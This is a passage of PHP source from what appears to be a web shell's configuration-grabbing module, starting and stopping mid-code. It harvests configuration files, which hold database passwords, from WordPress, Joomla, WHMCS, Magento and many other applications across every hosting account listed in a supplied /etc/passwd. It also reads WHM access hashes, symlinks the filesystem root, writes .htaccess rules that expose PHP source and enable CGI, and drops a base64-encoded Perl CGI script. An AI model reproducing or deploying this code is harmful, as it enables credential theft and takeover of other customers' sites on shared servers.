copy('/'.$home.'/'.$user.'/'.$dir1.'/home/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/v1/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/v2/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/press/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/new/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/blogs/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/blog/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/submitticket.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/cms/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/beta/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/portal/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/site/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/main/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/home/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/demo/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/test/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/v1/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/v2/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/joomla/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/new/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/app/etc/local.xml',$user.' MAGENTO.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/config/settings.inc.php',$user.' PRESTASHOP.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/wp/test/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/blog/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/beta/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/portal/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/site/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/wp/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/WP/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/news/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/wordpress/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/test/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/demo/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/home/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/v1/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/v2/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/press/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/new/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/blogs/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/blog/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/submitticket.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/cms/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/beta/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/portal/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/site/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/main/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/home/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/demo/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/test/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/v1/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/v2/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/joomla/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/new/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/app/etc/local.xml',$user.' MAGENTO.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/config/settings.inc.php',$user.' PRESTASHOP.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/application/config/database.php',$user.' ELLISLAB.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/admin/config.php',$user.' OPENCART.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/default/settings.php',$user.' DRUPAL.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/forum/config.php',$user.' PHPBB.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/application/config/database.php',$user.' ELLISLAB.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/admin/config.php',$user.' OPENCART.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/default/settings.php',$user.' DRUPAL.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/forum/config.php',$user.' PHPBB.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/vb/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/forum/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/vb/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/forum/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt'); copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/conn.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/inc/config.inc.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/application/config/database.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/application/config/database.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/inc/config.inc.php',$user.' OTHER.txt'); copy('/var/www/wp-config.php','WORDPRESS.txt'); copy('/var/www/configuration.php','JOOMLA.txt'); copy('/var/www/config.inc.php','OPENJOURNAL.txt'); copy('/var/www/config.php','OTHER.txt'); copy('/var/www/config/koneksi.php','OTHER.txt'); copy('/var/www/include/config.php','OTHER.txt'); copy('/var/www/connect.php','OTHER.txt'); copy('/var/www/config/connect.php','OTHER.txt'); copy('/var/www/include/connect.php','OTHER.txt'); copy('/var/www/html/wp-config.php','WORDPRESS.txt'); copy('/var/www/html/configuration.php','JOOMLA.txt'); copy('/var/www/html/config.inc.php','OPENJOURNAL.txt'); copy('/var/www/html/config.php','OTHER.txt'); copy('/var/www/html/config/koneksi.php','OTHER.txt'); copy('/var/www/html/include/config.php','OTHER.txt'); copy('/var/www/html/connect.php','OTHER.txt'); copy('/var/www/html/config/connect.php','OTHER.txt'); copy('/var/www/html/include/connect.php','OTHER.txt'); symlink('/var/www/wp-config.php','WORDPRESS.txt'); symlink('/var/www/configuration.php','JOOMLA.txt'); symlink('/var/www/config.inc.php','OPENJOURNAL.txt'); symlink('/var/www/config.php','OTHER.txt'); symlink('/var/www/config/koneksi.php','OTHER.txt'); symlink('/var/www/include/config.php','OTHER.txt'); symlink('/var/www/connect.php','OTHER.txt'); symlink('/var/www/config/connect.php','OTHER.txt'); symlink('/var/www/include/connect.php','OTHER.txt'); symlink('/var/www/html/wp-config.php','WORDPRESS.txt'); symlink('/var/www/html/configuration.php','JOOMLA.txt'); symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt'); symlink('/var/www/html/config.php','OTHER.txt'); symlink('/var/www/html/config/koneksi.php','OTHER.txt'); symlink('/var/www/html/include/config.php','OTHER.txt'); symlink('/var/www/html/connect.php','OTHER.txt'); symlink('/var/www/html/config/connect.php','OTHER.txt'); symlink('/var/www/html/include/connect.php','OTHER.txt'); } echo '<i><b><a href='.$folfig.'>./Done ClickMe For Ress Config Symlink</a></b></i></center>';echo "\n</body>\n</html>\n"; } if ($_POST['vhost']){ $folder = $_POST['base_dir1']; $folder1 = getcwd ().'/yanz/'; $folfig = 'yanz/yanz.cin'; mkdir("yanz"); $name = "wp-config.php"; $monyet = $folder1.'.htaccess'; $monyet2 = $folder1.'yanz.cin'; $hta ='T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQoKQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuY2luCgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLmNpbgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLmNpbg=='; $cc = base64_decode($hta); file_put_contents ($monyet, $cc); echo '<i><b><a href='.$folfig.'>./Done ClickMe For Ress Vhost Config yanz.cin</a></b></i></center>'; $data1 = base64_decode( "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPHRpdGxlPi46VzRyMTBrIC0gQ29sZEhhY2tlcnMgOi48L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiBibGFjazsKIHRleHQtYWxpZ246IGNlbnRlcjsKfQpwewogICAgY29sb3I6cmVkO2EKfQo8L3N0eWxlPgo8L2hlYWQ+Cic7CnByaW50ICcKPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSI+CjxwPi46IENvZGVkIGJ5IFc0cjEwayB8IENvbGRIYWNrZXJzIDouPC9wPgo8cD5rdXJhbGludXhAZ21haWwuY29tPC9wPgonOwpvcGVuZGlyKG15ICRkaXIgLCAi"); $data2 = $_POST['file_name1']; $data3 = base64_decode("Iik7CmZvcmVhY2goc29ydCByZWFkZGlyICRkaXIpIHsKICAgIG15ICRpc0RpciA9IDA7CiAgICAkaXNEaXIgPSAxIGlmIC1kICRfOwokc2l0ZXNzID0gJF87CnN5bWxpbmsoJw=="); $data4 = $_POST['file_name1']; $data5 = base64_decode("Jy4kc2l0ZXNzLic="); $data6 = $_POST['base_dir1']; $data7 = base64_decode("d3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7Cn0KcHJpbnQgIjxpbWcgc3JjPSdodHRwczovL2kuaWJiLmNvL0hWZlZWcVAvNjdmYTM1LTI1YzVhMGYzMDFkODQzMWRhMWFjZjZlY2Q2OWYwMmU0LnBuZycgIGhlaWdodD0nMzAwJz48YnI+PGJyPjxmb250IGNvbG9yPXJlZD5Eb25lICEhIDwvZm9udD4iOw=="); $alldata = $data1.$data2.$data3.$data4.$data5.$data6.$data7; file_put_contents ($monyet2, $alldata); $ran = 'yanz.cin'; $gojj = get_filename(__FILE__).'.php'; $x_path = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $ranres = '/yanz/'.$ran; $linkr = str_replace($gojj,$ranres,$x_path); $index = getcwd ().$ranres; chmod($index, 0755); } if ($_POST) { if ($_POST['configxx'] == 'symvhosts') { @mkdir("symvhosts", 0777); exe("ln -s / symvhosts/root"); $htaccess = "Options Indexes FollowSymLinks DirectoryIndex hex.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any"; @file_put_contents("symvhosts/.htaccess", $htaccess); $etc_passwd = $_POST['passwd']; $etc_passwd = explode(" ", $etc_passwd); foreach ($etc_passwd as $passwd) { $pawd = explode(":", $passwd); $user = $pawd[5]; $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user); if (preg_match('/vhosts/i', $user)) { exe("ln -s " . $user . "/httpdocs/wp-config.php symvhosts/" . $jembod . "-Wordpress.txt"); exe("ln -s " . $user . "/httpdocs/configuration.php symvhosts/" . $jembod . "-Joomla.txt"); exe("ln -s " . $user . "/httpdocs/config/koneksi.php symvhosts/" . $jembod . "-Lokomedia.txt"); exe("ln -s " . $user . "/httpdocs/forum/config.php symvhosts/" . $jembod . "-phpBB.txt"); exe("ln -s " . $user . "/httpdocs/sites/default/settings.php symvhosts/" . $jembod . "-Drupal.txt"); exe("ln -s " . $user . "/httpdocs/config/settings.inc.php symvhosts/" . $jembod . "-PrestaShop.txt"); exe("ln -s " . $user . "/httpdocs/app/etc/local.xml symvhosts/" . $jembod . "-Magento.txt"); exe("ln -s " . $user . "/httpdocs/admin/config.php symvhosts/" . $jembod . "-OpenCart.txt"); exe("ln -s " . $user . "/httpdocs/application/config/database.php symvhosts/" . $jembod . "-Ellislab.txt"); } } } if ($_POST['configxx'] == 'symlink') { @mkdir("symconfig", 0777); @symlink("/", "symconfig/root"); $htaccess = "Options Indexes FollowSymLinks DirectoryIndex hex.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any"; @file_put_contents("symconfig/.htaccess", $htaccess); } if ($_POST['configxx'] == '404') { @mkdir("sym404", 0777); @symlink("/", "sym404/root"); $htaccess = "Options Indexes FollowSymLinks DirectoryIndex hex.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=* IndexIgnore *.txt404 RewriteEngine On RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC] RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]"; @file_put_contents("sym404/.htaccess", $htaccess); } if ($_POST['configxx'] == 'grab') { mkdir("configgrab", 0777); $isi_htc = "Options all Require None Satisfy Any"; $htc = fopen("configgrab/.htaccess", "w"); fwrite($htc, $isi_htc); } $passwd = $_POST['passwd']; preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach ($user_config[1] as $user_hex) { $grab_config = array("/home/$user_hex/.accesshash" => "WHM-accesshash", "/home/$user_hex/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_hex/public_html/forum/config.php" => "phpBB", "/home/$user_hex/public_html/sites/default/settings.php" => "Drupal", "/home/$user_hex/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_hex/public_html/app/etc/local.xml" => "Magento", "/home/$user_hex/public_html/admin/config.php" => "OpenCart", "/home/$user_hex/public_html/application/config/database.php" => "Ellislab", "/home/$user_hex/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_hex/public_html/includes/config.php" => "Vbulletin", "/home/$user_hex/public_html/forum/includes/config.php" => "Vbulletin", "/home/$user_hex/public_html/forums/includes/config.php" => "Vbulletin", "/home/$user_hex/public_html/cc/includes/config.php" => "Vbulletin", "/home/$user_hex/public_html/inc/config.php" => "MyBB", "/home/$user_hex/public_html/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/shop/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/os/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/products/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/cart/includes/configure.php" => "OsCommerce", "/home/$user_hex/public_html/inc/conf_global.php" => "IPB", "/home/$user_hex/public_html/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/wp/test/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/blog/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/beta/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/portal/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/site/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/wp/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/WP/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/news/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/wordpress/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/test/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/demo/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/home/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/v1/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/v2/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/press/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/new/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/blogs/wp-config.php" => "Wordpress", "/home/$user_hex/public_html/configuration.php" => "Joomla", "/home/$user_hex/public_html/blog/configuration.php" => "Joomla", "/home/$user_hex/public_html/configuration.php" => "^WHMCS", "/home/$user_hex/public_html/cms/configuration.php" => "Joomla", "/home/$user_hex/public_html/beta/configuration.php" => "Joomla", "/home/$user_hex/public_html/portal/configuration.php" => "Joomla", "/home/$user_hex/public_html/site/configuration.php" => "Joomla", "/home/$user_hex/public_html/main/configuration.php" => "Joomla", "/home/$user_hex/public_html/home/configuration.php" => "Joomla", "/home/$user_hex/public_html/demo/configuration.php" => "Joomla", "/home/$user_hex/public_html/test/configuration.php" => "Joomla", "/home/$user_hex/public_html/v1/configuration.php" => "Joomla", "/home/$user_hex/public_html/v2/configuration.php" => "Joomla", "/home/$user_hex/public_html/joomla/configuration.php" => "Joomla", "/home/$user_hex/public_html/new/configuration.php" => "Joomla", "/home/$user_hex/public_html/WHMCS/configuration.php" => "WHMCS", "/home/$user_hex/public_html/whmcs1/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Whmcs/configuration.php" => "WHMCS", "/home/$user_hex/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_hex/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_hex/public_html/WHMC/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Whmc/configuration.php" => "WHMCS", "/home/$user_hex/public_html/whmc/configuration.php" => "WHMCS", "/home/$user_hex/public_html/WHM/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Whm/configuration.php" => "WHMCS", "/home/$user_hex/public_html/whm/configuration.php" => "WHMCS", "/home/$user_hex/public_html/HOST/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Host/configuration.php" => "WHMCS", "/home/$user_hex/public_html/host/configuration.php" => "WHMCS", "/home/$user_hex/public_html/SUPPORTES/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Supportes/configuration.php" => "WHMCS", "/home/$user_hex/public_html/supportes/configuration.php" => "WHMCS", "/home/$user_hex/public_html/domains/configuration.php" => "WHMCS", "/home/$user_hex/public_html/domain/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Hosting/configuration.php" => "WHMCS", "/home/$user_hex/public_html/HOSTING/configuration.php" => "WHMCS", "/home/$user_hex/public_html/hosting/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CART/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Cart/configuration.php" => "WHMCS", "/home/$user_hex/public_html/cart/configuration.php" => "WHMCS", "/home/$user_hex/public_html/ORDER/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Order/configuration.php" => "WHMCS", "/home/$user_hex/public_html/order/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CLIENT/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Client/configuration.php" => "WHMCS", "/home/$user_hex/public_html/client/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CLIENTAREA/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Clientarea/configuration.php" => "WHMCS", "/home/$user_hex/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_hex/public_html/SUPPORT/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Support/configuration.php" => "WHMCS", "/home/$user_hex/public_html/support/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BILLING/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Billing/configuration.php" => "WHMCS", "/home/$user_hex/public_html/billing/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BUY/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Buy/configuration.php" => "WHMCS", "/home/$user_hex/public_html/buy/configuration.php" => "WHMCS", "/home/$user_hex/public_html/MANAGE/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Manage/configuration.php" => "WHMCS", "/home/$user_hex/public_html/manage/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS", "/home/$user_hex/public_html/ClientSupport/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Clientsupport/configuration.php" => "WHMCS", "/home/$user_hex/public_html/clientsupport/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CHECKOUT/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Checkout/configuration.php" => "WHMCS", "/home/$user_hex/public_html/checkout/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BILLINGS/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Billings/configuration.php" => "WHMCS", "/home/$user_hex/public_html/billings/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BASKET/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Basket/configuration.php" => "WHMCS", "/home/$user_hex/public_html/basket/configuration.php" => "WHMCS", "/home/$user_hex/public_html/SECURE/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Secure/configuration.php" => "WHMCS", "/home/$user_hex/public_html/secure/configuration.php" => "WHMCS", "/home/$user_hex/public_html/SALES/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Sales/configuration.php" => "WHMCS", "/home/$user_hex/public_html/sales/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BILL/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Bill/configuration.php" => "WHMCS", "/home/$user_hex/public_html/bill/configuration.php" => "WHMCS", "/home/$user_hex/public_html/PURCHASE/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Purchase/configuration.php" => "WHMCS", "/home/$user_hex/public_html/purchase/configuration.php" => "WHMCS", "/home/$user_hex/public_html/ACCOUNT/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Account/configuration.php" => "WHMCS", "/home/$user_hex/public_html/account/configuration.php" => "WHMCS", "/home/$user_hex/public_html/USER/configuration.php" => "WHMCS", "/home/$user_hex/public_html/User/configuration.php" => "WHMCS", "/home/$user_hex/public_html/user/configuration.php" => "WHMCS", "/home/$user_hex/public_html/CLIENTS/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Clients/configuration.php" => "WHMCS", "/home/$user_hex/public_html/clients/configuration.php" => "WHMCS", "/home/$user_hex/public_html/BILLINGS/configuration.php" => "WHMCS", "/home/$user_hex/public_html/Billings/configuration.php" => "WHMCS", "/home/$user_hex/public_html/billings/configuration.php" => "WHMCS", "/home/$user_hex/public_html/MY/configuration.php" => "WHMCS", "/home/$user_hex/public_html/My/configuration.php" => "WHMCS", "/home/$user_hex/public_html/my/configuration.php" => "WHMCS", "/home/$user_hex/public_html/secure/whm/configuration.php" => "WHMCS", "/home/$user_hex/public_html/secure/whmcs/configuration.php" => "WHMCS", "/home/$user_hex/public_html/panel/configuration.php" => "WHMCS", "/home/$user_hex/public_html/clientes/configuration.php" => "WHMCS", "/home/$user_hex/public_html/cliente/configuration.php" => "WHMCS", "/home/$user_hex/public_html/support/order/configuration.php" => "WHMCS", "/home/$user_hex/public_html/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/box/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/host/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/Host/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/supportes/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/support/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/hosting/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/cart/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/order/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/client/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/clients/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/cliente/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/clientes/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/billing/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/billings/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/my/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/secure/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/support/order/bb-config.php" => "BoxBilling", "/home/$user_hex/public_html/includes/dist-configure.php" => "Zencart", "/home/$user_hex/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/$user_hex/public_html/products/includes/dist-configure.php" => "Zencart", "/home/$user_hex/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/$user_hex/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/$user_hex/public_html/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/host/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/support/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/order/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/client/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/my/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/$user_hex/public_html/support/order/includes/iso4217.php" => "Hostbills"); foreach ($grab_config as $config => $nama_config) { if ($_POST['configxx'] == 'grab') { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("configgrab/$user_hex-$nama_config.txt", "w"); fwrite($file_config, $ambil_config); } } if ($_POST['configxx'] == 'symlink') { @symlink($config, "Symconfig/" . $user_hex . "-" . $nama_config . ".txt"); } if ($_POST['configxx'] == '404') { $sym404 = symlink($config, "sym404/" . $user_hex . "-" . $nama_config . ".txt"); if ($sym404) { @mkdir("sym404/" . $user_hex . "-" . $nama_config . ".txt404", 0777); $htaccess = "Options Indexes FollowSymLinks DirectoryIndex hex.htm HeaderName hex.txt Satisfy Any IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble IndexIgnore *"; @file_put_contents("sym404/" . $user_hex . "-" . $nama_config . ".txt404/.htaccess", $htaccess); @symlink($config, "sym404/" . $user_hex . "-" . $nama_config . ".txt404/hex.txt"); } } } } if 